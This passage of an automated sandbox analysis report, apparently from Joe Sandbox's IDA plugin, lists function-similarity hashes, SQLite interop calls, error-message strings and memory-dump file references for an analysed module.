                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 26fc62f83a88a3982f12723d3e6e6e5ee3b39eb32039aad1fd49cf6ffc2e77b7
                                                                                                                                                                                                                                      • Instruction ID: 89983c9a3ee2125a08ee5496cf60f49f2a492218266f62e58173f7399b4931ce
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26fc62f83a88a3982f12723d3e6e6e5ee3b39eb32039aad1fd49cf6ffc2e77b7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC01D6767147145BD7009F69EC029C77798EF44725B00407AFA1EEB301F638F62186B5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000007,failed to %s %u bytes (%lu), heap=%p,HeapReAlloc,?,00000000), ref: 6BC51C16
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: HeapAlloc$HeapReAlloc$failed to %s %u bytes (%lu), heap=%p
                                                                                                                                                                                                                                      • API String ID: 2981141233-2123888023
                                                                                                                                                                                                                                      • Opcode ID: 200509aac918933e9a667398f1c6ab5fcdd3eec13beec6936d808d2961e175bc
                                                                                                                                                                                                                                      • Instruction ID: f6bb381eb38e4adeb2132279f47728181b7490e9508a8065a0ca2e3100794575
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 200509aac918933e9a667398f1c6ab5fcdd3eec13beec6936d808d2961e175bc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AEF0F9B2A552147BD6004EDE8C89D5BB36CDB49695F400151FE08CF200E538EE104264
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AA07,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC57F48
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC57F41
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57F32
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC57F3C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: b14c480169a3938c5d79c6106b515fc09d247aad9a3ad45a3ae533e97c4c7c41
                                                                                                                                                                                                                                      • Instruction ID: e1134f250b49b4441ab61b8129f9f5f094d029c9966f9929c7a102efc9fa7927
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b14c480169a3938c5d79c6106b515fc09d247aad9a3ad45a3ae533e97c4c7c41
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6901B1B1A10701ABD700DF35E801B8777E4AF00728F008059E95EEB300EB38E6609BE5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AC74,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,?,6BCDD2A7,?,000003E8), ref: 6BC6FC19
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC6FC12
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC6FC03
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC6FC0D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 9eb9bb6d4f54456694f5c3fbd8fb704287d609ab5ae249a9d4fe2769854cfb60
                                                                                                                                                                                                                                      • Instruction ID: 7dbe76103f8c7f762966ca01db03f8f29fac9a16ddf458d69a634219a846740a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9eb9bb6d4f54456694f5c3fbd8fb704287d609ab5ae249a9d4fe2769854cfb60
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8F08273B682143BE61466B47D07FC6638CCB406B9F100066FA0CEA282FA5DA72011AA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0001C826,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC58A78
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC58A71
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC58A62
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC58A6C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 90112bbd2df2f19bc51747569bb4105a4a2222aacd81f0bf1201334d6b5af82d
                                                                                                                                                                                                                                      • Instruction ID: 4f857eb8e41607c57e61d044e2d50b27e826f59ada749e6e1bc39df6f78d1b17
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90112bbd2df2f19bc51747569bb4105a4a2222aacd81f0bf1201334d6b5af82d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F01A271B207155BEB00AF749806E8B7798AB40729F444068E91DEB341EA38E62187E5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00015D01,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC59039
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC59032
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC59023
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC5902D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 39a828e9303d1d0aed0f8104156c1db2dd141999b17c8acf0c5febcf9cdee139
                                                                                                                                                                                                                                      • Instruction ID: d04c715d4bb3a87748f014031e1b904aa85bbf2d87976bc8fc248285d6efc32d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39a828e9303d1d0aed0f8104156c1db2dd141999b17c8acf0c5febcf9cdee139
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1F0A4B27102005B9B009BBAEC05D47779CABC0A29B0444A4FA0DEB242F679E62482B5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(%z%s"%w"."%w"."%w" IS NOT "%w"."%w"."%w",00000000,6BD06F50,?,?,?,?,?,?,?,?,?,6BCDE8E3,?,?,?), ref: 6BCCB68B
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(6BD08268,?,?,?,6BCDE8E3,?,?,?,?,?,00000000,6BCE21D9,?,?), ref: 6BCCB6AB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Idb45e174afb28e2c.
                                                                                                                                                                                                                                      • String ID: OR $%z%s"%w"."%w"."%w" IS NOT "%w"."%w"."%w"
                                                                                                                                                                                                                                      • API String ID: 778684903-3447757330
                                                                                                                                                                                                                                      • Opcode ID: cf490d7bab2d306948a7c07c1754d39fbb75235e9a9c6a20312179694650f98c
                                                                                                                                                                                                                                      • Instruction ID: 4e778476c3a2edc973859f7f1865406bd575dd7837e2520ba0fd896ef8c1b9b4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf490d7bab2d306948a7c07c1754d39fbb75235e9a9c6a20312179694650f98c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3DF0A4B1A2410D6BEB188EA0DD81E6777AA9794358F004038FC054B201FB75AD8187A3
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002ABDE,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC57A98
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC57A91
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57A82
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC57A8C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 82479bd5aa9ee4b9ae1c02bd8b0d0821c99b37a3d6bf134457eb5d1c9a772cf1
                                                                                                                                                                                                                                      • Instruction ID: 79dfe27b4416677eaae1223369d689d06a789fa85f09371f0e91ef51b1496f71
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 82479bd5aa9ee4b9ae1c02bd8b0d0821c99b37a3d6bf134457eb5d1c9a772cf1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97F08172B107145BDB00DF69E802E4B7798EF40625F04846AFE5EEB301EA38E62487A5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002ABF7,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC57A18
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC57A11
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57A02
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC57A0C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: e3a40155bd77cb6460c8b92ab60c7cf98b7d6f105dc9b427641347601f3b718b
                                                                                                                                                                                                                                      • Instruction ID: fc2736646e127b6f4318ed3c94b0219a0b77bcf7ceaef16b12e05b2546c2bc5b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e3a40155bd77cb6460c8b92ab60c7cf98b7d6f105dc9b427641347601f3b718b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0F0D172B107155BDB10DF69AC02E977798EF40624F044069FA2EEB701FA38EA6087A5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AC10,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC57998
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC57991
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57982
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC5798C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 4dff3d2d74397b99bef4cd4a08c70a49271640b77db16b61eda30f76437836c0
                                                                                                                                                                                                                                      • Instruction ID: 75a45aadc2e0163c8e880cf86e5a4aad34d3d5b1ae918422b01fb75f55af2eaa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4dff3d2d74397b99bef4cd4a08c70a49271640b77db16b61eda30f76437836c0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5F0F472B107115BDB10AF79AC02E477798EF40624F004039FE2DEB302F638F92086A9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A9EE,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC57FE8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC57FE1
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57FD2
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC57FDC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: 9598819196b97d7583ffe5cea2a0c7d9ef477f4b77f02d0c30a9270443a2d17b
                                                                                                                                                                                                                                      • Instruction ID: 76368e902a1373e0525a8b6de298e41d3e1a1bc94f431a5f5bdb463a73cb698c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9598819196b97d7583ffe5cea2a0c7d9ef477f4b77f02d0c30a9270443a2d17b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A00181B1A117149BDB10AF64E806B8777A8AF40729F004469ED6EEB341EB38E52087A5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002B293,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC571A8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC571A1
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57192
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC5719C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
